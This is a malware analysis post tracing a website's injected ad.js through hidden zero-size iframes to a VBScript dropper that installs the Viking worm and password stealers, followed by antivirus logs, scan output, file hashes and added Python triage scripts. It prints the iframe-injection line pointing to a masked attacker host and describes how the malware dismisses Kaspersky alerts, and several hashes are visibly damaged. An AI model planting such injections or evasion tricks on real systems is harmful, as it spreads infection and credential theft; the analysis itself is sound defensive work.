Endurer original
Version 1
While browsing a page on a city map website, Rising warned: Hack.Exploit.VML.g.
Inspecting the page shows that the images/ad.js it references contains the code:
/---
document.writeln("<IFRAME src=\"hxxp://m***.k***is**163.com//index.html?id=5\" width=0 height=0></IFRAME>");
---/
hxxp://m***.k***is*163.com/index.html?id=5 in turn contains the code:
/---
<IFRAME src="hxxp://web***.7***72***6.com/%0%%%%%%%.htm" width="0" height="0" frameborder="0"></IFRAME>
---/
hxxp://web***.7***72*7***6.com/%0%%%%%%.htm has the title "HTTP no found"; its content is VBScript code that calls a custom function:
/----
Function rechange(k)
    s = Split(k, ",")
    t = ""
    For i = 0 To UBound(s)
        t = t + Chr(Eval(s(i)))
    Next
    rechange = t
End Function
----/
This decodes the value of a variable (a comma-separated list of numeric expressions, each evaluated and turned into a character) and passes the result to Execute() to run it.
The decoded code is VBScript that uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file 0.exe, save it as %Temp%/svchost.exe and %Temp%/SVCHOST.vbs, and then run it through the ShellExecute method of the Shell.Application object.
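As an added example (not code from the post), the following Python script does the analyst's side of this: it pulls the comma-separated payload out of a script that calls `Execute rechange(var)`, evaluates each token as plain arithmetic through Python's `ast` module (never with `eval`), rebuilds the text exactly as the VBScript `rechange()` would, and reports which of the objects named above the decoded text mentions. The sample script, its encoder and the harmless decoded text are constructed for this demo; the only assumption about the real dropper is the structure visible above (a `t = "..."` assignment followed by `Execute rechange(t)`).

```python
"""Static triage for VBScript that decodes a comma-separated list of numeric
expressions with Chr(Eval(...)) and hands the result to Execute.
Added example, not the post's own tooling.
"""
import ast
import operator
import re

# Arithmetic permitted inside one token. Names, calls and attribute access are
# rejected, so no script code is ever executed while decoding.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
}

# Object names and methods the post says the decoded dropper uses.
INDICATORS = ("Microsoft.XMLHTTP", "Scripting.FileSystemObject",
              "Shell.Application", "ShellExecute", "%Temp%")


def safe_number(token: str) -> int:
    """Evaluate one token such as '104', '101+0' or '(216/2)' as arithmetic only."""
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and isinstance(node.op, ast.USub):
            return -walk(node.operand)
        raise ValueError("unsupported token: %r" % token)
    return int(walk(ast.parse(token.strip(), mode="eval")))


def rechange(k: str) -> str:
    """Python equivalent of the VBScript rechange(): Split on ',' then Chr(Eval(x))."""
    return "".join(chr(safe_number(tok)) for tok in k.split(","))


def extract_payload(script: str) -> str:
    """Find the variable passed to Execute rechange(<var>) and return its string value."""
    m = re.search(r"Execute\s*\(?\s*rechange\s*\(\s*(\w+)\s*\)", script, re.I)
    if not m:
        raise ValueError("no Execute rechange(...) call found")
    var = re.escape(m.group(1))
    # Non-empty string literals assigned to that variable; the longest one is the payload.
    values = re.findall(r'^\s*%s\s*=\s*"([^"]+)"' % var, script, re.I | re.M)
    if not values:
        raise ValueError("no string assignment to %s found" % m.group(1))
    return max(values, key=len)


def triage(script: str) -> dict:
    """Decode the payload statically and list which known objects it references."""
    decoded = rechange(extract_payload(script))
    found = [ind for ind in INDICATORS if ind.lower() in decoded.lower()]
    return {"decoded": decoded, "indicators": found}


def encode_like_sample(text: str) -> str:
    """Constructed encoder that mixes plain numbers with arithmetic, for the demo only."""
    tokens = []
    for i, ch in enumerate(text):
        n = ord(ch)
        tokens.append([str(n), "%d+0" % n, "(%d/2)" % (n * 2)][i % 3])
    return ",".join(tokens)


# Constructed, harmless stand-in for the decoded dropper: it only names an object.
BENIGN_DECODED = 'Set fso = CreateObject("Scripting.FileSystemObject"): MsgBox "decoded"'

# Constructed script with the same shape as the one described in the post.
SAMPLE_SCRIPT = """Function rechange(k)
s = Split(k, ",")
t = ""
For i = 0 To UBound(s)
t = t + Chr(Eval(s(i)))
Next
rechange = t
End Function
t = "%s"
Execute rechange(t)
""" % encode_like_sample(BENIGN_DECODED)

if __name__ == "__main__":
    result = triage(SAMPLE_SCRIPT)
    print(result["decoded"])
    print("indicators:", result["indicators"])
```

Because every token goes through `safe_number`, a payload element that is not arithmetic (a function call, a name) raises `ValueError` instead of running, which is the property that makes this safe to point at unknown scripts.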
File description: D:/test/0.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:33:14
Modification time: 12:33:14
Access time: 12:34:20
Size: 93240 bytes, 91.56 KB
MD5: ef70da-91d050cc898319acbb044e847
Kaspersky reports: Worm.Win32.Viking.II
Once 0.exe runs, it downloads further malicious files and infects EXE files.
The following is Kaspersky 6's log after 0.exe was run:
/----
Detected: Risk software Trojan.Generic  Running process: D:/test/0.exe
Detected: Trojan program Trojan-PSW.Win32.Magania.jm  File: C:/winnt/system32/wincab.sys
Detected: Trojan program Trojan-PSW.Win32.OnLineGames.es  File: C:/winnt/SMSs.exe
Detected: Risk software Invader  Running process: C:/winnt/SVCHOST.exe
Detected: Risk software Invader (loader)  Running process: C:/winnt/assumer.exe
Detected: Trojan program Backdoor.Win32.Agent.ALH  File: C:/winnt/system32/systemt.exe/upack
Detected: Trojan program Trojan-PSW.Win32.OnLineGames.gs  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/atkzudi5/smsss00001cmd.exe
Detected: Trojan program Trojan.Win32.Agent.abf  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/276batuz/lsasss1_12.16.exe/pe_patch/upack
Detected: Trojan program Trojan-PSW.Win32.OnLineGames.es  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/cx67wl2n/avg00001cmd.exe
Detected: Trojan program Trojan-PSW.Win32.OnLineGames.es  File: C:/winnt/csrss.exe
Detected: Trojan program Trojan-PSW.Win32.OnLineGames.es  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/mut33wp4/datsc1_1cmd.exe
Detected: Trojan program Trojan-Downloader.Win32.Small.czl  File: C:/winnt/10sy.exe
Detected: Trojan program Trojan-PSW.Win32.WOW.ec  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/o56r812f/adobesvc1_12.16.exe
Detected: Trojan program Trojan-PSW.Win32.OnLineGames.es  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/e1itg5sv/svchots00001cmd.exe
Detected: Trojan program Trojan-Downloader.Win32.Small.czl  File: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/9ulfumaw/mstcs1_1cmd.exe
----/
It is worth noting that the virus searches for Kaspersky's alert window (class name AVP.AlertDialog) and simulates clicking "Allow" and "Skip", and sends a WM_CLOSE message to Kaspersky's notification window (class name AVP.Product_Notification) to close it, so the user never gets a chance to respond.
A scan with pe_xscan finds the following suspicious items:
/---
pe_xscan by Purple Endurer
2007-3-5 12:44:24
Windows 2000 Service Pack 4 (5.0.2195)
Administrator user group
[System process] * 0
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
C:/winnt/explorer.EXE * 928 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.3700.6690 | Windows Explorer | copyright (c) Microsoft Corp. 1981-1999 | 5.00.3700.6690 | Microsoft Corporation | ? | Explorer | EXPLORER.EXE
C:/winnt/richdll.dll | 12:37:41
C:/winnt/system32/wsttrs.dll | 12:37:47
C:/winnt/system32/internat.exe * 1176 | 2000-1-10 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.2900000000 | keyboard language indicator applet | copyright (c) Microsoft Corp. 1994-1999 | 5.00.2900000000 | Microsoft Corporation | ? | Internat.exe
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
D:/program files/Tencent/QQ/qq.exe * 516 | 8:52:30 | Tencent QQ | 0, 0, 0, 0 | QQ | copyright ? 2005 | 0, 0, 0, 0 | Tencent | comqqd | qq.exe
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
D:/program files/Maxthon/maxthon.exe * 904 | Maxthon application | 1, 5, 9, 80 | Maxthon Web browser | copyright (c) 2002 | 1, 5, 9, 80 | Maxthon International Ltd. | Maxthon.EXE
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
D:/program files/editplus 2/editplus.exe * 588 | 9:32:12 | editplus | 2, 2, 1,330 | editplus | copyright ? 1998-2005 es-computing | 2, 2, 1,330 | es-computing | editplus.exe
C:/winnt/system32/wsttrs.dll | 12:37:47
C:/winnt/system32/notepad.exe * 508 | 2000-1-10 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.2140.1 | notepad | copyright (c) Microsoft Corp. 1981-1999 | 5.00.2140.1 | Microsoft Corporation | ? | Notepad.exe
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
C:/winnt/system32/conime.exe * 1476 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.2195.6655 | console IME | copyright (c) Microsoft Corp. 1981-1999 | 5.00.2195.6655 | Microsoft Corporation | ? | Console | conime.exe
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
D:/PE/tools/3.exe * 1508 | 12:43:37
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
O4 - HKLM/../Run: [wsttrs] C:/winnt/SVCHOST.exe
O23 - Service: Shiji (Shiji) - C:/winnt/system32/wincab.sys (manually started)
---/
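Three things stand out in that listing: the same DLL, wsttrs.dll, sits inside every process (a DLL-injection pattern), the Run key named after it launches a SVCHOST.exe that lives in C:/winnt rather than system32, and a service points at a .sys file outside the drivers directory. The following is an added Python example (not pe_xscan's or the post's code) that parses this listing format and flags exactly those three things. The line grammar it assumes is what is visible above: process lines as `path * pid | fields`, module lines as `path | time`, and O4/O23 entries; the sample log is an abridged copy of the listing.

```python
"""Parse a pe_xscan-style listing and flag an injected DLL, masquerading Run
entries and drivers outside the drivers directory. Added example, not the
scanner's own code.
"""
import re
from collections import Counter

# Abridged from the listing above, spacing normalised. Not a complete scan.
SAMPLE_LOG = """\
[System process] * 0
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
C:/winnt/explorer.EXE * 928 | MICROSOFT (r) Windows (r) 2000 operating system | 5.00.3700.6690
C:/winnt/richdll.dll | 12:37:41
C:/winnt/system32/wsttrs.dll | 12:37:47
C:/winnt/system32/internat.exe * 1176 | 2000-1-10 | MICROSOFT (r) Windows (r) 2000 operating system
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
D:/program files/Tencent/QQ/qq.exe * 516 | 8:52:30 | Tencent QQ
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
C:/winnt/system32/notepad.exe * 508 | 2000-1-10 | MICROSOFT (r) Windows (r) 2000 operating system
C:/winnt/system32/wsttrs.dll | 12:37:47, 2007-3-5
O4 - HKLM/../Run: [wsttrs] C:/winnt/SVCHOST.exe
O23 - Service: Shiji (Shiji) - C:/winnt/system32/wincab.sys (manually started)
"""

PROCESS_RE = re.compile(r"^(?P<path>.+?) \* (?P<pid>\d+)(?: \| .*)?$")
MODULE_RE = re.compile(r"^(?P<path>.+?\.dll) \| .*$", re.I)
RUN_RE = re.compile(r"^O4 - (?P<key>\S+): \[(?P<name>[^\]]+)\] (?P<cmd>.+)$")
SERVICE_RE = re.compile(r"^O23 - Service: (?P<name>.+?) - (?P<path>.+?) \((?P<start>[^)]+)\)$")

# Core Windows binaries that belong in system32; a file elsewhere that borrows
# one of these names (like C:/winnt/SVCHOST.exe above) is masquerading.
SYSTEM32_NAMES = {"svchost.exe", "csrss.exe", "smss.exe", "services.exe",
                  "lsass.exe", "winlogon.exe"}


def parse_log(text: str) -> dict:
    """Group each process line with the module lines that follow it."""
    result = {"processes": [], "run_keys": [], "services": []}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = RUN_RE.match(line)
        if m:
            result["run_keys"].append(m.groupdict())
            continue
        m = SERVICE_RE.match(line)
        if m:
            result["services"].append(m.groupdict())
            continue
        m = PROCESS_RE.match(line)
        if m:
            current = {"path": m["path"], "pid": int(m["pid"]), "modules": []}
            result["processes"].append(current)
            continue
        m = MODULE_RE.match(line)
        if m and current is not None:
            current["modules"].append(m["path"])
    return result


def injected_modules(parsed: dict, min_share: float = 1.0) -> list:
    """Modules (lower-cased) present in at least min_share of the listed processes."""
    procs = parsed["processes"]
    if not procs:
        return []
    counts = Counter(mod for p in procs for mod in {m.lower() for m in p["modules"]})
    needed = max(1, int(len(procs) * min_share))
    return sorted(mod for mod, n in counts.items() if n >= needed)


def masquerades_system_binary(path: str) -> bool:
    """True when the file name is a core system binary's but the path is not under system32."""
    p = path.lower().replace("\\", "/")
    name = p.rsplit("/", 1)[-1].split(" ")[0]
    return name in SYSTEM32_NAMES and "/system32/" not in p


def report(text: str) -> dict:
    parsed = parse_log(text)
    return {
        "injected_dlls": injected_modules(parsed),
        "suspicious_run_keys": [r["cmd"] for r in parsed["run_keys"]
                                if masquerades_system_binary(r["cmd"])],
        "suspicious_services": [s["path"] for s in parsed["services"]
                                if s["path"].lower().endswith(".sys")
                                and "/drivers/" not in s["path"].lower()],
    }


if __name__ == "__main__":
    for key, items in report(SAMPLE_LOG).items():
        print(key, items)
```

`injected_modules` takes a share rather than an absolute count so the same check works on a full listing where a legitimately shared DLL (kernel32.dll, for instance) would also appear everywhere; on a real scan you would exclude known system DLLs before reading the result.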
File description: C:/winnt/system32/wsttrs.dll
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:47
Modification time: 12:37:47
Access time: 13:35:18
Size: 23539 bytes, 22.1011 KB
MD5: 6e25ea101a59463623725d6073058dc1
Kaspersky reports: Trojan-PSW.Win32.Magania.jm.1
Rising reports: Trojan.PSW.Wlonline.JCV
File description: C:/winnt/richdll.dll
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:41
Modification time: 12:37:41
Access time: 13:38:25
Size: 29721 bytes, 29.25 KB
MD5: a936b1dba52bbbc79cf23f9d965d2646
Kaspersky reports: Worm.Win32.Viking.II
File description: C:/winnt/SVCHOST.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:46
Modification time: 12:37:46
Access time:
Size: 69859 bytes, 68.227 KB
MD5: 2424f02a0ea72ffeae27f8b33fb5dfc9
Kaspersky reports: Trojan-PSW.Win32.Magania.jm.1
Rising reports: Trojan.PSW.Roc.ad
File description: C:/winnt/10sy.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:38:15
Modification time: 13:47:44
Access time: 13:49:17
Size: 25072 bytes, 24.496 KB
MD5: 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky reports: Trojan-Downloader.Win32.Small.czl
Rising reports: Trojan.PSW.LMir.MDW
File description: C:/winnt/system32/systemt.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:56
Modification time: 12:59:27
Access time:
Size: 26130 bytes, 25.530 KB
MD5: 8ae1afdb6a25da-a5d55a4eb5389121c
Kaspersky reports: Backdoor.Win32.Agent.ALH
File description: C:/Documents and Settings/PE/Local Settings/temp/q9xtwt5.dll
Attribute: ash-
An error occurred while obtaining the file version information!
Creation time: 12:37:46
Modification time: 12:37:46
Access time:
Size: 32483 bytes, 31.739 KB
MD5: b19d0273f424ed7e3dc4fb95a70f48a4
Kaspersky reports: Trojan-PSW.Win32.Magania.jm.1
Rising reports: Rootkit.Vanti.Vr
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/atkzudi5/Web[1].dll
Attribute: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time: 13:27:43
Size: 17227 bytes, 16.843 KB
MD5: c68f384f846fc5943e8470ff37d9111d
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/atkzudi5/smsss00001cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:57
Modification time: 12:37:59
Access time: 13:25:55
Size: 13824 bytes, 13.512 KB
MD5: 3f864049a2fde64042a82565d4ff92af
Kaspersky reports: Trojan-PSW.Win32.OnLineGames.gs
Rising reports: Trojan.PSW.Zhengtu.ANC
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/276batuz/lsasss1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time:
Access time: 13:23:29
Size: 40968 bytes, 40.8 KB
MD5: 23f203134804fa6f2dda-67267595dc5
Kaspersky reports: Trojan.Win32.Agent.abf
Rising reports: Trojan.Agent.fii
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/cx67wl2n/avg1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:43
Modification time:
Access time: 13:21:48
Size: 13824 bytes, 13.512 KB
MD5: 3cec40cb6a2ba1e57c91a083c10b09e4
This file is copied to: C:/winnt/SMSs.exe
Kaspersky reports: Trojan-PSW.Win32.OnLineGames.es
Rising reports: Trojan.PSW.OnlineGames.In
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/mut33wp4/datsc1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:38:10
Modification time: 12:38:10
Access time: 13:17:19
Size: 13824 bytes, 13.512 KB
MD5: a9b8b545f24b36e52fd0176db42becdd
Kaspersky reports: Trojan-PSW.Win32.OnLineGames.es
Rising reports: Trojan.PSW.Agent.jdm
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/o56r812f/adobesvc1_12.16.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:38:25
Modification time: 13:38:28
Access time: 13:15:18
Size: 226868 bytes, 221.564 KB
MD5: 54ce2ffabb6ddefd26d5360d427870c2
Kaspersky reports: Trojan-PSW.Win32.WOW.ec
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/e1itg5sv/svchots00001cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time:
Modification time: 12:38:32
Access time: 13:13:13
Size: 14848 bytes, 14.512 KB
MD5: a4721319bf2f16aed92fdc8623ad0623
This file is copied to: C:/winnt/csrss.exe
Kaspersky reports: Trojan-PSW.Win32.OnLineGames.es
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/9ulfumaw/inetinf1_1).exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:37:49
Modification time: 12:37:55
Access time:
Size: 279652 bytes, 273.100 KB
MD5: 10a390602afad9926028417607ac094a
This file is copied to: C:/winnt/services.exe
Kaspersky reports: Backdoor.Win32.Agent.ALH
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/9ulfumaw/mstcs1_1cmd.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation time: 12:38:14
Modification time:
Access time: 13:10:36
Size: 25072 bytes, 24.496 KB
MD5: 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky reports: Trojan-Downloader.Win32.Small.czl
Rising reports: Trojan.PSW.LMir.MDW
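The file descriptions above are more useful once correlated than read one by one: 10sy.exe and mstcs1_1cmd.exe carry the same MD5 (one download stored under two names), three of the cached files are exactly 13824 bytes with different hashes (server-side variants of one dropper), and several cached files are copied to C:/winnt under system-binary names (SMSs.exe, csrss.exe, services.exe). The following is an added Python example, not the post's own tooling, that parses these blocks into records and performs that correlation; it also reports MD5 lines that are not 32 hex digits, since a few of the hashes above were damaged in extraction and must not be used as indicators. The sample report is an abridged copy of the blocks above, hashes included, with the spacing normalised.

```python
"""Parse 'File description' blocks into records and correlate them by MD5,
size and copy target. Added example, not the post's own code.
"""
import re
from collections import defaultdict

# Abridged from the blocks above; the hashes are the post's, including one
# damaged MD5 line kept as it appears.
SAMPLE_REPORT = """\
File description: C:/winnt/10sy.exe
Attribute: ---
Size: 25072 bytes, 24.496 KB
MD5: 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky reports: Trojan-Downloader.Win32.Small.czl
Rising reports: Trojan.PSW.LMir.MDW
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/atkzudi5/smsss00001cmd.exe
Size: 13824 bytes, 13.512 KB
MD5: 3f864049a2fde64042a82565d4ff92af
Kaspersky reports: Trojan-PSW.Win32.OnLineGames.gs
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/cx67wl2n/avg1_1cmd.exe
Size: 13824 bytes, 13.512 KB
MD5: 3cec40cb6a2ba1e57c91a083c10b09e4
This file is copied to: C:/winnt/SMSs.exe
Kaspersky reports: Trojan-PSW.Win32.OnLineGames.es
File description: C:/winnt/system32/systemt.exe
Size: 26130 bytes, 25.530 KB
MD5: 8ae1afdb6a25da-a5d55a4eb5389121c
Kaspersky reports: Backdoor.Win32.Agent.ALH
File description: C:/Documents and Settings/PE/Local Settings/Temporary Internet Files/content.ie5/9ulfumaw/mstcs1_1cmd.exe
Size: 25072 bytes, 24.496 KB
MD5: 12082524ff15f50f1c2ef2f9e2ac90a7
Kaspersky reports: Trojan-Downloader.Win32.Small.czl
"""

FIELD_RE = re.compile(
    r"^(?P<key>File description|Attribute|Size|MD5|Kaspersky reports|"
    r"Rising reports|This file is copied to)\s*:\s*(?P<value>.*)$")
MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def parse_report(text: str) -> list:
    """One record per 'File description' block; md5 is None unless well formed."""
    records, cur = [], None
    for raw in text.splitlines():
        m = FIELD_RE.match(raw.strip())
        if not m:
            continue
        key, value = m["key"], m["value"].strip()
        if key == "File description":
            cur = {"path": value, "size": None, "md5": None, "md5_raw": None,
                   "av": {}, "copied_to": None}
            records.append(cur)
        elif cur is None:
            continue
        elif key == "Size":
            cur["size"] = int(value.split()[0])
        elif key == "MD5":
            cur["md5_raw"] = value
            cur["md5"] = value.lower() if MD5_RE.match(value.lower()) else None
        elif key == "This file is copied to":
            cur["copied_to"] = value
        elif key in ("Kaspersky reports", "Rising reports"):
            cur["av"][key.split()[0]] = value
    return records


def same_hash_different_paths(records: list) -> dict:
    """MD5 -> paths where one sample was stored under more than one name."""
    by_md5 = defaultdict(list)
    for r in records:
        if r["md5"]:
            by_md5[r["md5"]].append(r["path"])
    return {h: paths for h, paths in by_md5.items() if len(paths) > 1}


def same_size_different_hash(records: list) -> dict:
    """size -> sorted MD5s for equal-size files with different contents."""
    by_size = defaultdict(set)
    for r in records:
        if r["md5"] and r["size"]:
            by_size[r["size"]].add(r["md5"])
    return {s: sorted(hs) for s, hs in by_size.items() if len(hs) > 1}


def unusable_hashes(records: list) -> list:
    """Paths whose MD5 line is present but not 32 hex digits."""
    return [r["path"] for r in records if r["md5_raw"] and not r["md5"]]


def copy_targets(records: list) -> list:
    return [(r["path"], r["copied_to"]) for r in records if r["copied_to"]]


def ioc_hashes(records: list) -> list:
    return sorted({r["md5"] for r in records if r["md5"]})


if __name__ == "__main__":
    recs = parse_report(SAMPLE_REPORT)
    print("duplicate samples:", same_hash_different_paths(recs))
    print("same size, different hash:", same_size_different_hash(recs))
    print("unusable MD5 lines:", unusable_hashes(recs))
    print("copied to:", copy_targets(recs))
    print("IoC hashes:", ioc_hashes(recs))
```

Only well-formed hashes reach `ioc_hashes`, so a damaged line such as the systemt.exe one ends up in `unusable_hashes` instead of being pushed into a blocklist where it could never match anything.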